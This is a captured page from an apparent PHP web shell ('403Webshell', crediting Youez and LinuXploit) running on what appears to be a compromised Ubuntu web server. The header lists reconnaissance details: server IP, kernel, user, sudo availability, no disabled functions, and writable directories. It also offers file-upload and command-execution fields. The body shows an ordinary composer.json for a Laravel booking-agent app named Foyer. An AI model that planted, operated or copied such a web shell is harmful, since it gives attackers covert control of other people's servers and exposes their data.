403Webshell
Server IP : 35.80.110.71  /  Your IP : 216.73.216.221
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux ip-172-31-21-44 6.17.0-1019-aws #19~24.04.1-Ubuntu SMP Tue Jun 23 18:53:06 UTC 2026 x86_64
User : ubuntu ( 1000)
PHP Version : 8.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/foyer/current/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/foyer/current/composer.json
{
    "$schema": "https://getcomposer.org/schema.json",
    "name": "philiprehberger/foyer",
    "type": "project",
    "description": "Foyer — conversational booking agent for local-service businesses. SMS + web chat, 15-minute slot hold, DB-enforced no-overlap, human-confirm gate.",
    "keywords": ["booking-agent", "sms", "twilio", "google-calendar", "service-business", "ai-agent", "laravel", "foyer"],
    "license": "MIT",
    "require": {
        "php": "^8.3",
        "filament/filament": "^5.6",
        "laravel/framework": "^13.8",
        "laravel/horizon": "^5.47",
        "laravel/sanctum": "^4.0",
        "laravel/tinker": "^3.0",
        "predis/predis": "^3.5",
        "twilio/sdk": "^8.0",
        "google/apiclient": "^2.18",
        "intervention/image": "^3.6",
        "league/flysystem-aws-s3-v3": "^3.0",
        "symfony/uid": "^7.0",
        "ramsey/uuid": "^4.7",
        "sentry/sentry-laravel": "^4.10",
        "guzzlehttp/guzzle": "^7.9"
    },
    "require-dev": {
        "brianium/paratest": "^7.20",
        "fakerphp/faker": "^1.23",
        "hotmeteor/spectator": "^3.0",
        "laravel/pail": "^1.2.5",
        "laravel/pint": "^1.27",
        "mockery/mockery": "^1.6",
        "nunomaduro/collision": "^8.6",
        "phpunit/phpunit": "^12.5.12",
        "larastan/larastan": "^3.0"
    },
    "autoload": {
        "psr-4": {
            "App\\": "app/",
            "Database\\Factories\\": "database/factories/",
            "Database\\Seeders\\": "database/seeders/"
        }
    },
    "autoload-dev": {
        "psr-4": {
            "Tests\\": "tests/"
        }
    },
    "scripts": {
        "setup": [
            "composer install",
            "@php -r \"file_exists('.env') || copy('.env.example', '.env');\"",
            "@php artisan key:generate",
            "@php artisan migrate --force"
        ],
        "test": "@php artisan test",
        "post-autoload-dump": [
            "Illuminate\\Foundation\\ComposerScripts::postAutoloadDump",
            "@php artisan package:discover --ansi"
        ]
    },
    "extra": {
        "laravel": {
            "dont-discover": []
        }
    },
    "config": {
        "optimize-autoloader": true,
        "preferred-install": "dist",
        "sort-packages": true,
        "allow-plugins": {
            "php-http/discovery": true
        }
    },
    "minimum-stability": "stable",
    "prefer-stable": true
}

Youez - 2016 - github.com/yon3zu
LinuXploit